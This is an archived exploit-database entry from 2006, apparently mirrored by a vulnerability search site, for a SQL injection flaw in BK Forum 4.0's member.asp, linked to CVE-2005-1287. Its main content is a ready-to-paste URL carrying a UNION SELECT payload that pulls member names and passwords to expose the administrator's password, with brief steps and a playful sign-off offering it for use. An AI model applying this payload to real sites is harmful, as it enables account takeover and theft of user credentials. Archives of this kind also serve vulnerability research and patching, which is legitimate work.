Lucene search
N0m3rcyEDB-ID:1714HistoryApr 24, 2006 - 12:00 a.m.
BK Forum 4.0 - 'member.asp' SQL Injection
2006-04-2400:00:00
n0m3rcy
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <[email protected]>
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]Related
cvelist
cvelist
CVE-2005-1287
2005-04-26 04:00:00
nvd
nvd
CVE-2005-1287
2005-04-23 04:00:00
cve
cve
CVE-2005-1287
2005-04-26 04:00:00